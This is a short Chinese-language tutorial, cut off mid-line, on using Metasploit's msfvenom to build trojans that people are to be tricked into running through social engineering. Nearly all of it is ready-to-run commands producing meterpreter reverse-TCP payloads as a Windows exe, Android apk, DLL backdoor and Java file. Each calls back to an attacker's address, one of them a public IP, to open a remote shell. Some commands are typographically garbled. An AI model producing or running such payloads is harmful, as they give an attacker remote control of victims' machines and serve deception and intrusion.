Ox01 简介
在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马在社会工程学中是我们经常使用的手段,本次实验我们将学习如何通过Metasploit的 msfvenom命令来生成木马。
Ox02 使用msfvenom生成木马
msfvenom -p windows/meterpreter/reverse_tcp Ihost=103.46.128.46 lport=55497 -f exe >/home/anonymous/文件名.exe代码注释:
-p Payload架构 -f 木马文件格式
>文件输出/放置路径 Ihost kali本机ip地址 Iport kali本机端口号
0x03 使用msfvenom生成各种木马
1. msfvenom-p
windows/meterpreter/reverse_tcp
LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe //exe文件
2. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > apk.apk//安卓
3. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444-a x86-fd>
shell.dll // DLL后门
4. msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.7 LP